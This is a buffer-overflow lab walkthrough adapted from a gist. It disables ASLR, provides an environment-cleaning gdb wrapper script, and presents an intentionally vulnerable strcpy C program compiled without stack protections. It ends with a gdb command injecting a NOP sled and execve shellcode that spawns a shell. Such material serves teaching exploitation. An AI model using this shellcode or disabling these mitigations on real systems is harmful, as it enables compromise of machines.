// taken from source https://gist.github.com/apolloclark/6cffb33f179cc9162d0a
cat /proc/sys/kernel/randomize_va_space
# NOTE: this appends to /etc/sysctl.conf, so ASLR stays disabled system-wide
# and across reboots (and a duplicate line is appended on every run). Lab
# machines only; to revert, delete the line and set the value back to the
# kernel default of 2 with `sudo sysctl -w kernel.randomize_va_space=2`.
sudo bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'
sudo sysctl -p
cat /proc/sys/kernel/randomize_va_space
# verify "0"
# allow core dumps; this only affects the current shell and its children
ulimit -c unlimited
ulimit -c
# verify "unlimited"
http://stackoverflow.com/questions/17775186/buffer-overflow-works-in-gdb-but-not-without-it
[envexec.sh]
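#!/bin/sh
# envexec.sh - run a program, optionally under gdb, with a minimal and explicit
# environment so the process image is the same inside and outside the debugger.
#
# Options:
#   -e KEY=VALUE  environment variable to pass through (may be repeated)
#   -d            run the program under gdb
#   -t            like -d, but attach the inferior's terminal to /tmp/gdb-debug-pty
#   -h, -?        print usage and exit
#
# Everything after the options is the program and its arguments.

# Print the usage line to stdout.
usage() {
  printf 'usage: %s [-d|-t] -e KEY=VALUE prog [args...]\n' "$(basename "$0")"
}

# Initialise explicitly so values inherited from the caller's environment
# (an exported "gdb" or "tty", say) cannot change what the script does.
env=
gdb=
tty=
while getopts "dte:h?" opt; do
  case "$opt" in
    h|\?)
      usage
      exit 0
      ;;
    t)
      tty=1
      gdb=1
      ;;
    d)
      gdb=1
      ;;
    e)
      # Accumulate so that every -e reaches the target (previously only the
      # last one survived). Space-separated and expanded unquoted below on
      # purpose: each KEY=VALUE has to become a separate argument to env.
      env="$env $OPTARG"
      ;;
  esac
done
shift $((OPTIND - 1))

if [ $# -lt 1 ]; then
  usage >&2
  exit 2
fi

# Resolve to an absolute path: `env -` empties PATH, so a bare name such as
# "vul" would not be found by exec.
prog=$(readlink -f -- "$1") || exit 1
shift
if [ ! -x "$prog" ]; then
  printf '%s: not an executable file: %s\n' "$(basename "$0")" "$prog" >&2
  exit 1
fi

# `env -` discards the inherited environment; only TERM, PWD and the -e
# variables are passed on. $env is intentionally unquoted (see above).
# shellcheck disable=SC2086
if [ -n "$gdb" ]; then
  if [ -n "$tty" ]; then
    # Fixed path kept for compatibility with the original; note it is a
    # predictable name in /tmp and a plain file rather than a real terminal.
    touch /tmp/gdb-debug-pty
    exec env - $env TERM=screen PWD="$PWD" gdb -tty /tmp/gdb-debug-pty --args "$prog" "$@"
  else
    exec env - $env TERM=screen PWD="$PWD" gdb --args "$prog" "$@"
  fi
else
  exec env - $env TERM=screen PWD="$PWD" "$prog" "$@"
fi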
[vul.c]
#include <stdio.h>
#include <string.h>
/*
 * Intentionally vulnerable lab target. argv[1] is copied into a fixed
 * 500-byte stack buffer with strcpy(), which performs no bounds check, so an
 * argument longer than the buffer overwrites the adjacent stack data (saved
 * frame pointer, return address). There is also no argc check, so running it
 * without an argument passes NULL to strcpy(). The program exists only to be
 * compiled without mitigations (see the gcc flags below) and studied in gdb;
 * a bounded copy (strncpy/snprintf with sizeof buffer) is the real-world fix.
 */
int main (int argc, char** argv)
{
char buffer[500];
strcpy(buffer, argv[1]); /* unbounded copy: the overflow under study */
return 0;
}
# compile the code
# NOTE: the source above is labelled vul.c, this compiles vuln.c, and the
# commands that follow run both "vul" and "vuln" — pick one name and use it
# throughout, or the later steps will not find the binary.
# The flags deliberately switch off mitigations for the lab:
#   -z execstack                   stack pages are executable (no NX on stack)
#   -fno-stack-protector           no canary between buffer and saved frame data
#   -mpreferred-stack-boundary=4   keep the stack 16-byte aligned (2^4) so the
#                                  frame layout is predictable
#   -g                             debug symbols for list/disas in gdb
gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=4 -g vuln.c -o vuln
# clean the environment, debug
chmod +x envexec.sh
./envexec.sh -d vul
# clean the environment, execute exploit
# "$(python ...)" is a placeholder for whatever generates the argument; running
# through envexec.sh keeps the environment (and so the stack layout) the same as
# in the gdb session above.
./envexec.sh /root/vul $(python ...)
# run gdb, load a program to analyze
gdb vuln
# quit the debugger
quit
# clear the screen
ctrl + l
shell clear
# show the source via the debugging symbols, i.e. the code
list
list main
# show the assembly code
disas main
# examine information
info os
info functions
info variables
# run the program, with input
run Hello
# run the overflow, seg fault
run $(python -c 'print "\x41" * 1000')
# examine memory address
x/200x ($rsp - 1010)
# overwrite rbp
run $(python -c 'print "\x90" * 453 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x51\x51\x51\x51" * 10')